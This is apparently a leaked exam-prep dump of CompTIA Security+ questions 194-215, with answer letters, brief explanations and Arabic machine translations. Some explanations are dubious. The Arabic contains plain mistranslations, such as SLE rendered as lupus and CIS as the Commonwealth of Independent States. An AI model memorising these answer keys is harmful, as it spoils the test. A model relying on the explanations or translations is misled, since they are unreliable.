‫ يمكن للأجهزة العميلة قليلة السمك تقليل التكلفة والتعقيد ومخاطر الأمان لإدارة‬.‫موارد الحوسبة ونظام التشغيل والتكوين المركزي والبيانات‬
.‫أجهزة متعددة‬
194. Which of the following describes where an attacker can purchase DDoS or ransomware services?
A. Threat intelligence
B. Open-source intelligence
C. Vulnerability database
D. Dark web
Answer: D
Explanation:
The best option to describe where an attacker can purchase DDoS or ransomware services is
the dark web. The dark web is an anonymous, untraceable part of the internet where a variety of illicit
activities take place, including the purchase of DDoS and ransomware services. According to the
CompTIA Security+ SY0-601 Official Text Book, attackers can purchase these services anonymously
and withoutthe risk of detection or attribution. Additionally, the text book recommends that organizations
monitor thedark web to detect any possible threats or malicious activity.
‫أي مما يلي يصف المكان الذي يمكن للمهاجم فيه شراء أو خدمات برامج الفدية؟ الويب المظلم‬
98 / 198
The safer , easier way to help you pass any IT exams.
195. Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. Web application scan
B. Threat intelligence
C. Log aggregation
D. Packet capture
Answer: D
‫؟ التقاط الحزم‬80 ‫أي مما يلي يمكن استخدامه لاكتشاف المتسلل الذي يسرق بيانات الشركة عبر المنفذ‬
196. Which of the following is constantly scanned by internet bots and has the highest risk of attack in the
case of the default configurations?
A. Wearable sensors
B. Raspberry Pi
C. Surveillance systems
D. Real-time operating systems
Answer: C
Explanation:
Surveillance systems are constantly scanned by internet bots and have the highest risk of attack in
the case of the default configurations because they are often connected to the internet and use weak or
default passwords that can be easily guessed or cracked by malicious bots.
‫أي مما يلي يتم فحصه باستمرار بواسطة روبوتات الإنترنت ولديه أعلى خطر للهجوم في حالة التكوينات الافتراضية؟‬
‫أنظمة المراقبة‬
‫ يتم فحص أنظمة المراقبة باستمرار بواسطة روبوتات الإنترنت ولديها أعلى مخاطر الهجوم في حالة التكوينات الافتراضية لأنها غالبا ما تكون‬:‫تفسير‬
.‫متصلة بالإنترنت وتستخدم كلمات مرور ضعيفة أو افتراضية يمكن تخمينها بسهولة أو اختراقها بواسطة برامج الروبوت الضارة‬
197.A company is concerned about individuals driving a car into the building to gain access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
Bollards are posts designed to prevent vehicles from entering an area. They are usually made of steel or
concrete and are placed close together to make it difficult for vehicles to pass through. In addition to
preventing vehicles from entering an area, bollards can also be used to protect buildings and pedestrians
from ramming attacks. They are an effective and cost-efficient way to protect buildings and pedestrians
from unauthorized access.
‫ أي من عناصر التحكم الأمنية‬.‫ وتشعر إحدى الشركات بالقلق إزاء الأفراد الذين يقودون سيارة إلى المبنى للوصول إليها‬-197
‫التالية ستعمل بشكل أفضل لمنع حدوث ذلك؟ بولارد‬
‫ عادة ما تكون مصنوعة من الفولاذ أو الخرسانة ويتم‬.‫ الأعمدة هي أعمدة مصممة لمنع المركبات من دخول المنطقة‬:‫تفسير‬
، ‫ بالإضافة إلى منع المركبات من دخول منطقة ما‬.‫وضعها بالقرب من بعضها البعض لجعل من الصعب على المركبات المرور‬
‫ إنها طريقة فعالة وفعالة من حيث التكلفة لحماية‬.‫يمكن أيضا استخدام الأعمدة لحماية المباني والمشاة من هجمات الدهس‬
.‫المباني والمشاة من الوصول غير المصرح به‬
99 / 198
The safer , easier way to help you pass any IT exams.
198.Which of the following can be used to calculate the total loss expected per year due to a threat
targeting an asset?
A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO
Answer: D
Explanation:
The total loss expected per year due to a threat targeting an asset can be calculated using the Single
Loss Expectancy (SLE) multiplied by the Annualized Rate of Occurrence (ARO). SLE is the monetary
loss expected from a single event, while ARO is the estimated frequency of that event occurring in a
year.
‫أي مما يلي يمكن استخدامه لحساب إجمالي الخسارة المتوقعة سنويا بسبب تهديد يستهدف أحد الأصول؟ سلي ارو‬.198
‫ يمكن حساب إجمالي الخسارة المتوقعة سنويا بسبب تهديد يستهدف أحد الأصول باستخدام الخسارة الفردية المتوقعة‬:‫تفسير‬
‫ في حين‬، ‫ مرض الذئبة الحمراء هو الخسارة المالية المتوقعة من حدث واحد‬.)ARO( ‫) مضروبة في معدل الحدوث السنوي‬SLE(
.‫ هو التكرار المقدر لهذا الحدث الذي يحدث في السنة‬ARO ‫أن‬
199.A company has hired an assessment team to test the security of the corporate network and
employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware of this
exercise, and very little information has been provided to the assessors.
Which of the following is taking place?
A. A red-team test
B. A white-team test
C. A purple-team test
D. A blue-team test
Answer: A
Explanation:
A red-team test is a type of security assessment that simulates a real-world attack on an organization’s
network, systems, applications, and people. The goal of a red-team test is to evaluate the organization’s
security posture, identify vulnerabilities and gaps, and test the effectiveness of its detection and
response capabilities. A red-team test is usually performed by a group of highly skilled security
professionals who act as adversaries and use various tools and techniques to breach the organization’s
defenses. A red-team test is often conducted without the knowledge or consent of most of the
organization’s staff, except for a few senior executives who authorize and oversee the exercise.
‫ ولا يعلم بهذه العملية سوى كبير‬.‫ عينت إحدى الشركات فريق تقييم لاختبار أمن شبكة الشركة ويقظة الموظفين‬-199
‫ أي من الآتي يحدث؟‬.‫ ولم يقدم إلى المقيمين سوى معلومات قليلة جدا‬،‫الموظفين التنفيذيين وكبير الموظفين التنفيذيين‬
‫اختبار الفريق الأحمر‬
‫ اختبار الفريق الأحمر هو نوع من التقييم الأمني الذي يحاكي هجوما حقيقيا على شبكة المؤسسة وأنظمتها وتطبيقاتها‬:‫تفسير‬
‫ واختبار فعالية‬، ‫ وتحديد نقاط الضعف والثغرات‬، ‫ الهدف من اختبار الفريق الأحمر هو تقييم الوضع الأمني للمؤسسة‬.‫وأفرادها‬
‫ عادة ما يتم إجراء اختبار الفريق الأحمر من قبل مجموعة من المتخصصين الأمنيين ذوي المهارات‬.‫اكتشافها و قدرات الاستجابة‬
‫ غالبا ما يتم إجراء اختبار الفريق‬.‫العالية الذين يعملون كخصوم ويستخدمون أدوات وتقنيات مختلفة لاختراق دفاعات المنظمة‬
‫ باستثناء عدد قليل من كبار المديرين التنفيذيين الذين يأذنون ويشرفون‬، ‫الأحمر دون علم أو موافقة معظم موظفي المنظمة‬
.‫على العملية‬
100 / 198
The safer , easier way to help you pass any IT exams.
200.A company is adopting a BYOD policy and is looking for a comprehensive solution to protect
company information on user devices.
Which of the following solutions would best support the policy?
A. Mobile device management
B. Full device encryption
C. Remote wipe
D. Biometrics
Answer: A
Explanation:
Mobile device management (MDM) is a solution that allows an organization to manage, monitor, and
secure mobile devices that are used by employees for work purposes. It can protect company
information on user devices by enforcing policies and controls such as encryption, password, remote
wipe, etc., and detecting and preventing unauthorized access or data leakage.
‫ أي من‬.‫ وتبحث عن حل شامل لحماية معلومات الشركة على أجهزة المستعملين‬BYOD ‫ تعتمد إحدى الشركات سياسة‬-200
‫الحلول التالية يدعم السياسة بشكل أفضل؟ إدارة الأجهزة الجوالة‬
201.A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to
use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.
Answer: B
Explanation:
Disabling remote logins to the NAS likely involved turning off SSH instead of modifying the configuration
file. This would prevent users from using SCP to transfer files to the NAS, even though the data is still
viewable from the users' PCs. Source: TechTarget
‫ تتضمن إحدى تقنيات التصلب التي يستخدمها المهندس تعطيل عمليات‬.‫ بدأ مهندس أمن جديد في تقوية الأنظمة‬-201
NAS ‫ لنقل الملفات إلى‬SCP ‫ يقوم المستخدمون الآن بالإبلاغ عن عدم القدرة على استخدام‬.NAS ‫تسجيل الدخول عن بعد إلى‬
‫ أي مما يلي هو السبب الأكثر‬.‫ على الرغم من أن البيانات لا تزال قابلة للعرض من أجهزة الكمبيوتر الخاصة بالمستخدمين‬،
‫ بدلا من تعديل ملف التكوين‬SSH ‫احتمالا لهذه المشكلة؟ تم إيقاف تشغيل‬
‫ بدلا من تعديل ملف‬SSH ‫ إيقاف تشغيل‬NAS ‫ من المحتمل أن يتضمن تعطيل عمليات تسجيل الدخول عن بعد إلى‬:‫تفسير‬
‫ على الرغم من أن البيانات لا تزال‬، NAS ‫ لنقل الملفات إلى‬SCP ‫ سيؤدي ذلك إلى منع المستخدمين من استخدام‬.‫التكوين‬
TechTarget :‫ المصدر‬.‫قابلة للعرض من أجهزة الكمبيوتر الخاصة بالمستخدمين‬
101 / 198
The safer , easier way to help you pass any IT exams.
202.A company recently enhanced mobile device configuration by implementing a set of security
controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in
place, an unattended phone was used by a malicious actor to access corporate data.
Which of the following additional controls should be put in place first?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
Answer: C
Explanation:
According to NIST Special Publication 1800-4B1, some of the security controls that can be used to
protect mobile devices include:
✑ Root and jailbreak detection: ensures that the security architecture for a mobile device has not been
compromised.
✑ Encryption: protects the data stored on the device and in transit from unauthorized access.
✑ Authentication: verifies the identity of the user and the device before granting access to enterprise
resources.
✑ Remote wipe: allows the organization to erase the data on the device in case of loss or theft.
✑ Screen lock timer: sets a time limit for the device to lock itself after a period of inactivity.
،‫ القياسات الحيوية‬:‫وقامت إحدى الشركات مؤخرا بتحسين تكوين الأجهزة المحمولة من خلال تنفيذ مجموعة من الضوابط الأمنية‬-202
‫ تم استخدام هاتف غير‬، ‫ حتى مع وجود هذه الإعدادات في مكانها الصحيح‬.‫ والتشفير الكامل للجهاز‬،‫والمصادقة الواعية بالسياق‬
‫ أي من الضوابط الإضافية الآتية يجب وضعها أولا؟‬.‫مراقب من قبل جهة خبيثة للوصول إلى بيانات الشركة‬
‫مؤقت قفل الشاشة‬
:‫ تتضمن بعض عناصر التحكم الأمنية التي يمكن استخدامها لحماية الأجهزة المحمولة ما يلي‬، B14-1800 ‫ الخاص‬NIST ‫وفقا لمنشور‬
‫ يحمي البيانات المخزنة على‬:‫ ✑ التشفير‬.‫ يضمن أن بنية الأمان لجهاز محمول لم تكن كذلك الخطر‬:‫✑ اكتشاف الجذر وكسر الحماية‬
‫ تتحقق من هوية المستخدم والجهاز قبل منح حق الوصول إلى موارد‬:‫ ✑ المصادقة‬.‫الجهاز وأثناء نقلها من الوصول غير المصرح به‬
‫ ✑ مؤقت قفل‬.‫ يسمح للمؤسسة بمسح البيانات الموجودة على الجهاز في حالة فقدانها أو سرقتها‬:‫ ✑ المسح عن بعد‬.‫المؤسسة‬
.‫ يعين حدا زمنيا للجهاز لقفل نفسه بعد فترة من عدم النشاط‬:‫الشاشة‬
102 / 198
The safer , easier way to help you pass any IT exams.
203.A junior human resources administrator was gathering data about employees to submit to a new
company awards program The employee data included job title business phone number location first
initial with last name and race. Which of the following best describes this type of information?
A. Sensitive
B. Non-Pll
C. Private
D. Confidential
Answer: B
Explanation:
Non-PII stands for non-personally identifiable information, which is any data that does not directly identify
a specific individual. Non-PII can include information such as job title, business phone number, location,
first initial with last name, and race. Non-PII can be used for various purposes, such as statistical
analysis, marketing, or research. However, non-PII may still pose some privacy risks if it is combined or
linked with other data that can reveal an individual’s identity.
‫ ويقوم مسؤول مبتدئ للموارد البشرية بجمع بيانات عن الموظفين لتقديمها إلى برنامج جديد لجوائز الشركة وتضمنت بيانات‬-203
‫ أي من الآتي يصف هذا النوع من‬.‫الموظف المسمى الوظيفي رقم هاتف النشاط التجاري الموقع الأول من اسمه الأخير وعرقه‬
‫المعلومات؟ نون بلل‬
‫ وهي أي بيانات لا تحدد هوية فرد معين بشكل‬، ‫ تشير معلومات عدم تحديد الهوية الشخصية إلى المعلومات غير الشخصية‬:‫تفسير‬
‫ معلومات مثل المسمى الوظيفي ورقم هاتف العمل والموقع والحرف الأول من اسمك‬PII ‫ يمكن أن تتضمن معلومات غير‬.‫مباشر‬
‫ قد لا‬، ‫ ومع ذلك‬.‫ مثل التحليل الإحصائي أو التسويق أو البحث‬، ‫ لأغراض مختلفة‬PII ‫ يمكن استخدام معلومات غير‬.‫الأخير والعرق‬
.‫يزال لا يزال يشكل بعض مخاطر الخصوصية إذا تم دمجه أو ربطه ببيانات أخرى يمكن أن تكشف عن هوية الفرد‬
204.While performing a threat-hunting exercise, a security analyst sees some unusual behavior
occurring in an application when a user changes the display name.
The security analyst decides to perform a static code analysis and receives the following pseudocode:
Which of the following attack types best describes the root cause of the unusual behavior?
A. Server-side request forgery
B. Improper error handling
C. Buffer overflow
D. SQL injection
Answer: D
Explanation:
SQL injection is one of the most common web hacking techniques.
‫ يرى محلل أمني بعض السلوك غير المعتاد يحدث في أحد التطبيقات عندما يغير‬، ‫ أثناء إجراء تمرين لتعقب التهديدات‬-204
‫ أي من أنواع الهجمات التالية‬:‫ يقرر محلل الأمان إجراء تحليل رمز ثابت ويتلقى الكود الكاذب التالي‬.‫المستخدم اسم العرض‬
‫يصف السبب الجذري للسلوك غير المعتاد وصفا أفضل؟‬
103 / 198
The safer , easier way to help you pass any IT exams.
205.A company's help desk has received calls about the wireless network being down and users being
unable to connect to it. The network administrator says all access pcints are up and running. One of the
help desk technicians notices the affected users are working in a near the parking Jot.
Which Of the following IS the most likely reason for the outage?
A. Someone near the is jamming the signal.
B. A user has set up a rogue access point near building.
C. Someone set up an evil twin access Print in tie affected area.
D. The APS in the affected area have been from the network
Answer: A
Explanation:
Wireless jamming is a way for an attacker to disrupt a wireless network and create a denial of ser-vice
situation by decreasing the signal-to-noise ratio at the receiving device. The attacker would need to be
relatively close to the wireless network to overwhelm the good signal. The other options are not likely to
cause a wireless network outage for users near the parking lot.
.‫ وتلقى مكتب المساعدة التابع لشركة ما مكالمات بشأن تعطل الشبكة اللاسلكية وعدم قدرة المستعملين على الاتصال بها‬-205
‫ يلاحظ أحد فنيي مكتب المساعدة أن المستخدمين المتأثرين‬.‫يقول مسؤول الشبكة إن جميع أجهزة الكمبيوتر للوصول قيد التشغيل‬
‫ أي مما يلي هو السبب الأكثر احتمالا للانقطاع؟‬.‫يعملون بالقرب من موقف السيارات‬
.‫شخص ما بالقرب من التشويش على الإشارة‬
‫ التشويش اللاسلكي هو وسيلة للمهاجم لتعطيل شبكة لاسلكية وخلق حالة إنكار للخدمة عن طريق تقليل نسبة الإشارة إلى‬:‫تفسير‬
‫ من غير‬.‫ سيحتاج المهاجم إلى أن يكون قريبا نسبيا من الشبكة اللاسلكية للتغلب على الإشارة الجيدة‬.‫الضوضاء في جهاز الاستقبال‬
.‫المحتمل أن تتسبب الخيارات الأخرى في انقطاع الشبكة اللاسلكية للمستخدمين بالقرب من موقف السيارات‬
206.Multiple beaconing activities to a malicious domain have been observed. The malicious domain is
hosting malware from various endpoints on the network.Which of the following technologies would be
best to correlate the activities between the different end points?
A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer
Answer: B
Explanation:
A SIEM technology would be best to correlate the activities between the different end points that are
beaconing to a malicious domain.
.‫ يستضيف المجال الضار برامج ضارة من نقاط نهاية مختلفة على الشبكة‬.‫وقد لوحظت أنشطة إرشاد متعددة لمجال ضار‬-206
siem ‫أي من التقنيات التالية سيكون من الأفضل ربط الأنشطة بين نقاط النهاية المختلفة؟‬
.‫ هي الأفضل لربط الأنشطة بين نقاط النهاية المختلفة التي تنير إلى مجال ضار‬SIEM ‫ستكون تقنية‬
104 / 198
The safer , easier way to help you pass any IT exams.
207.A security analyst received the following requirements for the deployment of a security camera
solution:
* The cameras must be viewable by the on-site security guards.
+ The cameras must be able to communicate with the video storage server.
* The cameras must have the time synchronized automatically.
* The cameras must not be reachable directly via the internet.
* The servers for the cameras and video storage must be available for remote maintenance via the
company VPN.
Which of the following should the security analyst recommend to securely meet the remote connectivity
requirements?
A. Creating firewall rules that prevent outgoing traffic from the subnet the servers and cameras reside on
B. Deploying a jump server that is accessible via the internal network that can communicate
with theservers
C. Disabling all unused ports on the switch that the cameras are plugged into and enabling MAC filtering
D. Implementing a WAF to allow traffic from the local NTP server to the camera server
Answer: B
Explanation:
A jump server is a system that is used to manage and access systems in a separate security zone. It
acts as a bridge between two different security zones and provides a controlled and secure way of
accessing systems between them. A jump server can also be used for auditing traffic and user activity for
real-time surveillance.
‫ يجب أن تكون الكاميرات قابلة للعرض من قبل حراس الأمن‬:‫ وتلقى محلل أمني المتطلبات التالية لنشر حل كاميرا أمنية‬-207
.‫ يجب مزامنة الوقت تلقائيا مع الكاميرات‬.‫ يجب أن تكون الكاميرات قادرة على الاتصال بخادم تخزين الفيديو‬+ .‫في الموقع‬
‫ يجب أن تكون خوادم الكاميرات وتخزين الفيديو متاحة للصيانة‬.‫يجب ألا تكون الكاميرات قابلة للوصول مباشرة عبر الإنترنت‬
‫ أي مما يلي يجب أن يوصي به محلل الأمان لتلبية متطلبات الاتصال عن بعد بشكل آمن؟‬.VPN ‫عن بعد عبر شركة‬
‫نشر خادم انتقال يمكن الوصول إليه عبر الشبكة الداخلية التي يمكنها الاتصال بالخوادم‬
‫ يعمل كجسر بين‬.‫ خادم الانتقال السريع هو نظام يستخدم لإدارة الأنظمة والوصول إليها في منطقة أمان منفصلة‬:‫تفسير‬
‫ يمكن أيضا استخدام خادم‬.‫منطقتين أمنيتين مختلفتين ويوفر طريقة خاضعة للرقابة وآمنة للوصول إلى الأنظمة بينهما‬
‫الانتقال السريع لتدقيق حركة المرور ونشاط المستخدم للمراقبة في الوقت الفعلي‬
105 / 198
The safer , easier way to help you pass any IT exams.
208.A network penetration tester has successfully gained access to a target machine.
Which of the following should the penetration tester do next?
A. Clear the log files of all evidence
B. Move laterally to another machine.
C. Establish persistence for future use.
D. Exploit a zero-day vulnerability.
Answer: C
Explanation:
Establishing persistence for future use is the next step that a network penetration tester should do after
gaining access to a target machine. Persistence means creating a backdoor or a covert channel that
allows the penetration tester to maintain access to the target machine even if the initial exploit is patched
or the connection is lost. Persistence can be achieved by installing malware, creating hidden user
accounts, modifying registry keys, or setting up remote access tools. Establishing persistence can help
the penetration tester to perform further reconnaissance, move laterally to other machines, or exfiltrate
data from the target network.
‫ أي مما يلي يجب أن يفعله اختبار الاختراق بعد ذلك؟‬.‫ نجح جهاز اختبار اختراق الشبكة في الوصول إلى جهاز مستهدف‬-208
.‫إنشاء المثابرة للاستخدام في المستقبل‬
‫ يعد إثبات المثابرة للاستخدام المستقبلي هو الخطوة التالية التي يجب على جهاز اختبار اختراق الشبكة القيام بها بعد الوصول إلى الجهاز‬:‫تفسير‬
‫ الثبات يعني إنشاء باب خلفي أو قناة سرية تسمح لمختبر الاختراق بالحفاظ على الوصول إلى الجهاز المستهدف حتى إذا تم تصحيح‬.‫المستهدف‬
‫ يمكن تحقيق الثبات عن طريق تثبيت البرامج الضارة أو إنشاء حسابات مستخدمين مخفية أو تعديل مفاتيح‬.‫الاستغلال الأولي أو فقد الاتصال‬
‫ أو الانتقال أفقيا إلى‬، ‫ يمكن أن يساعد إنشاء المثابرة جهاز اختبار الاختراق على إجراء مزيد من الاستطلاع‬.‫التسجيل أو إعداد أدوات الوصول عن بعد‬
.‫ أو استخراج البيانات من الشبكة المستهدفة‬، ‫أجهزة أخرى‬
209.A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server was
exposing an API that should have only been available from the companVs mobile application.
After reviewing the back-end server logs, the security analyst finds the following entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. user-agent spoofing
C. WAF bypass
D. Referrer manipulation
Answer: B
Explanation:
User-agent spoofing is a technique that allows an attacker to modify the user-agent header of an HTTP
request to impersonate another browser or device12. User-agent spoofing can be used to bypass
security controls that rely on user-agent filtering or validation12. In this case, the attacker spoofed the
user-agent header to match the company’s mobile application, which was allowed to access the backend server’s API2.
‫ كان‬.‫ تمكن الاستشاريون من تنزيل بيانات حساسة من خادم خلفي‬، ‫ أثناء اختبار الاختراق‬.‫ ويحقق محلل أمني في تقرير أجري عن اختبار اختراق‬-209
‫ بعد مراجعة سجلات الخادم‬.companVs ‫الخادم الخلفي يعرض واجهة برمجة تطبيقات كان يجب أن تكون متاحة فقط من تطبيق الهاتف المحمول‬
‫ أي مما يلي هو السبب الأكثر احتمالا لتجاوز التحكم الأمني؟ انتحال وكيل المستخدم‬:‫ يجد محلل الأمان الإدخالات التالية‬، ‫الخلفية‬
‫ يمكن‬.12‫ لانتحال شخصية متصفح أو جهاز آخر‬HTTP ‫ انتحال وكيل المستخدم هو أسلوب يسمح للمهاجم بتعديل رأس وكيل المستخدم لطلب‬:‫تفسير‬
‫ في هذه الحالة‬.12‫استخدام انتحال وكيل المستخدم لتجاوز عناصر التحكم في الأمان التي تعتمد على تصفية وكيل المستخدم أو التحقق من الصحة‬
‫ للخادم‬2 ‫ والذي سمح له بالوصول إلى واجهة برمجة التطبيقات‬، ‫ انتحل المهاجم رأس وكيل المستخدم لمطابقة تطبيق الهاتف المحمول للشركة‬،
.‫الخلفي‬
106 / 198
The safer , easier way to help you pass any IT exams.
210. Several users have been violating corporate security policy by accessing inappropriate Sites on
corporate-issued mobile devices while off campus.
The senior leadership team wants all mobile devices to be hardened with controls that:
✑ Limit the sites that can be accessed
✑ Only allow access to internal resources while physically on campus.
✑ Restrict employees from downloading images from company email
Whip of the following controls would best address this situation? (Select two).
A. MFA
B. GPS tagging
C. Biometric authentication
D. Content management
E. Geofencing
F. Screen lock and PIN requirements
Answer: D,E
Explanation:
Content management is a security control that can limit the sites that can be accessed by corporateissued mobile devices. It can also restrict employees from downloading images from company email by
filtering or blocking certain types of content1. Geofencing is a security control that can only allow access
to internal resources while physically on campus. It can use GPS or other location services to define a
virtual boundary around a physical area and enforce policies based on the device’s location2.
‫انتهك العديد من المستخدمين سياسة أمان الشركة من خلال الوصول إلى مواقع غير لائقة على الأجهزة المحمولة الصادرة عن الشركة أثناء‬
‫ ✑ تقييد المواقع التي يمكن الوصول‬:‫ يريد فريق القيادة العليا تقوية جميع الأجهزة المحمولة بعناصر التحكم التي‬.‫وجودهم خارج الحرم الجامعي‬
‫ ✑ تقييد الموظفين من تنزيل الصور من البريد‬.‫إليها ✑ اسمح فقط بالوصول إلى الموارد الداخلية أثناء وجودك فعليا في الحرم الجامعي‬
‫ إدارة المحتوى _ السياج الجغرافي‬.)‫الإلكتروني للشركة سوط من الضوابط التالية من شأنه أن يعالج هذا الموقف بشكل أفضل؟ (حدد اثنين‬
.‫ إدارة المحتوى هي عنصر تحكم أمني يمكن أن يحد من المواقع التي يمكن الوصول إليها بواسطة الأجهزة المحمولة الصادرة عن الشركات‬:‫تفسير‬
Geofencing .1‫ويمكنه أيضا تقييد الموظفين من تنزيل الصور من البريد الإلكتروني للشركة عن طريق تصفية أنواع معينة من المحتوى أو حظرها‬
‫ يمكنه استخدام نظام تحديد المواقع‬.‫هو عنصر تحكم أمني لا يسمح إلا بالوصول إلى الموارد الداخلية أثناء وجودك فعليا في الحرم الجامعي‬
.2‫) أو خدمات الموقع الأخرى لتحديد حد افتراضي حول منطقة فعلية وفرض السياسات بناء على موقع الجهاز‬GPS( ‫العالمي‬
211. Which of the following is a security implication of newer 1CS devices that are becoming more
common in corporations?
A. Devices with celular communication capabilities bypass traditional network security controls
B. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.
C. These devices often lade privacy controls and do not meet newer compliance regulations
D. Unauthorized voice and audio recording can cause loss of intellectual property
Answer: D
Explanation:
Industrial control systems (ICS) are devices that monitor and control physical processes, such as power
generation, manufacturing, or transportation. Newer ICS devices may have voice and audio capabilities
that can be exploited by attackers to eavesdrop on sensitive conversations or capture confidential
information. This can result in the loss of intellectual property or trade secrets.
‫ الأحدث التي أصبحت أكثر شيوعا في الشركات؟‬CS1 ‫أي مما يلي هو أحد الآثار الأمنية لأجهزة‬
‫يمكن أن يتسبب الصوت والتسجيل الصوتي غير المصرح به في فقدان الملكية الفكرية‬
‫ مثل توليد الطاقة أو التصنيع أو‬، ‫) هي أجهزة تراقب العمليات الفيزيائية وتتحكم فيها‬ICS( ‫ أنظمة التحكم الصناعية‬:‫تفسير‬
‫ الأحدث على إمكانات صوتية وصوتية يمكن استغلالها من قبل المهاجمين للتنصت على‬ICS ‫ قد تحتوي أجهزة‬.‫النقل‬
.‫ يمكن أن يؤدي ذلك إلى فقدان الملكية الفكرية أو الأسرار التجارية‬.‫المحادثات الحساسة أو التقاط معلومات سرية‬
107 / 198
The safer , easier way to help you pass any IT exams.
212.A systems administrator is required to enforce MFA for corporate email account access, relying on
the possession factor. Which of the following authentication methods should the systems administrator
choose? (Select two).
A. passphrase
B. Time-based one-time password
C. Facial recognition
D. Retina scan
E. Hardware token
F. Fingerprints
Answer: B,E
Explanation:
Time-based one-time password (TOTP) and hardware token are authentication methods that rely on the
possession factor, which means that the user must have a specific device or object in their possession to
authenticate. A TOTP is a password that is valid for a short period of time and is generated by an app or
a device that the user has. A hardware token is a physical device that displays a code or a password that
the user can enter to authenticate. A passphrase (Option A) is a knowledge factor, while facial
recognition (Option C), retina scan (Option D), and fingerprints (Option F) are all inherence factors.
.‫ بالاعتماد على عامل الحيازة‬،‫) للوصول إلى حساب البريد الإلكتروني للشركات‬MFA( ‫ويتعين على مدير النظم إنفاذ المصادقة متعددة العوامل‬.212
.)‫أي من طرق المصادقة التالية يجب أن يختارها مسؤول الأنظمة؟ (حدد اثنين‬
‫كلمة مرور لمرة واحدة تستند إلى الوقت _ رمز الأجهزة‬
‫ مما يعني أنه‬، ‫) المستندة إلى الوقت والرمز المميز للأجهزة هي طرق مصادقة تعتمد على عامل الحيازة‬TOTP( ‫ كلمة المرور لمرة واحدة‬:‫تفسير‬
‫ هي كلمة مرور صالحة لفترة قصيرة من الوقت ويتم إنشاؤها‬TOTP .‫يجب أن يكون لدى المستخدم جهاز أو كائن معين في حوزته للمصادقة‬
‫ عبارة‬.‫ الرمز المميز للأجهزة هو جهاز فعلي يعرض رمزا أو كلمة مرور يمكن للمستخدم إدخالها للمصادقة‬.‫بواسطة تطبيق أو جهاز يمتلكه المستخدم‬
‫ وبصمات الأصابع (الخيار و) كلها‬، )‫ ومسح شبكية العين (الخيار د‬، )‫ في حين أن التعرف على الوجه (الخيار ج‬، ‫المرور (الخيار أ) هي عامل معرفة‬
.‫عوامل تأصل‬
213.A company has installed badge readers for building access but is finding unau-thorized individualsroaming
the hallways Of the following is the most likely cause?
A. Shoulder surfing
B. Phishing
C. Tailgating
D. Identity fraud
Answer: C
Explanation:
Tailgating is a physical security threat that occurs when an unauthorized person follows an authorized
person into a restricted area without proper identification or authorization. It can cause unauthorized
individuals to roam the hallways after gaining access through badge readers installed for building
access.
‫ قامت شركة بتركيب قارئات شارات للوصول إلى المبنى ولكن هل تجد أفرادا غير مبالين يجوبون الممرات مما يلي هو‬-213
‫السبب الأكثر احتمالا؟ الذيل‬
‫ الذيل هو تهديد أمني مادي يحدث عندما يتبع شخص غير مصرح له شخصا مأذونا له في منطقة محظورة دون تحديد‬:‫تفسير‬
‫ يمكن أن يتسبب ذلك في تجول الأفراد غير المصرح لهم في الممرات بعد الوصول من خلال قارئات الشارات‬.‫أو إذن مناسب‬
.‫المثبتة للوصول إلى المبنى‬
108 / 198
The safer , easier way to help you pass any IT exams.
214.An annual information security assessment has revealed that several OS-level configurations are
not in compliance due to outdated hardening standards the company is using.
Which of the following would be best to use to update and reconfigure the OS-level security
configurations?
A. CIS benchmarks
B. GDPR guidance
C. Regional regulations
D. ISO 27001 standards
Answer: A
Explanation:
CIS benchmarks are best practices and standards for securing various operating systems, applications,
cloud environments, etc. They are developed by a community of experts and updated regularly to reflect
the latest threats and vulnerabilities. They can be used to update and reconfigure the OS-level security
configurations to ensure compliance and reduce risks.
‫ وكشف تقييم سنوي لأمن المعلومات أن العديد من التشكيلات على مستوى نظام التشغيل لا تمتثل بسبب معايير التصلب‬-214
‫ أي مما يلي سيكون من الأفضل استخدامه لتحديث وإعادة تكوين تكوينات الأمان على‬.‫التي عفا عليها الزمن التي تستخدمها الشركة‬
‫مستوى نظام التشغيل؟ المعايير المرجعية لرابطة الدول المستقلة‬
‫ يتم‬.‫ هي أفضل الممارسات والمعايير لتأمين مختلف أنظمة التشغيل والتطبيقات والبيئات السحابية وما إلى ذلك‬CIS ‫ معايير‬:‫تفسير‬
‫ يمكن استخدامها لتحديث وإعادة‬.‫تطويرها من قبل مجتمع من الخبراء ويتم تحديثها بانتظام لتعكس أحدث التهديدات ونقاط الضعف‬
.‫تكوين تكوينات الأمان على مستوى نظام التشغيل لضمان الامتثال وتقليل المخاطر‬
215.A security team is engaging a third-party vendor to do a penetration test of a new proprietary
application prior to its release.
Which of the following documents would the third-party vendor most likely be required to review and
sign?
A. SLA
B. NDA
C. MOU
D. AUP
Answer: B
Explanation:
NDA stands for Non-Disclosure Agreement, which is a legal contract that binds the parties to keep
confidential information secret and not to disclose it to unauthorized parties. A third-party vendor who is
doing a penetration test of a new proprietary application would most likely be required to review and sign
an NDA to protect the intellectual property and trade secrets of the security team.
‫ أي من المستندات‬.‫ يقوم فريق أمني بالاستعانة ببائع طرف ثالث لإجراء اختبار اختراق لتطبيق جديد مملوك قبل إصداره‬-215
‫التالية سيطلب من مورد الجهة الخارجية على الأرجح مراجعتها وتوقيعها؟ ندا‬
‫ وهي عقد قانوني يلزم الأطراف بالحفاظ على سرية المعلومات السرية وعدم‬، ‫ تعني اتفاقية عدم الإفشاء‬NDA :‫تفسير‬
‫ من المرجح أن يطلب من بائع الطرف الثالث الذي يقوم باختبار اختراق تطبيق جديد‬.‫الكشف عنها لأطراف غير مصرح لها‬
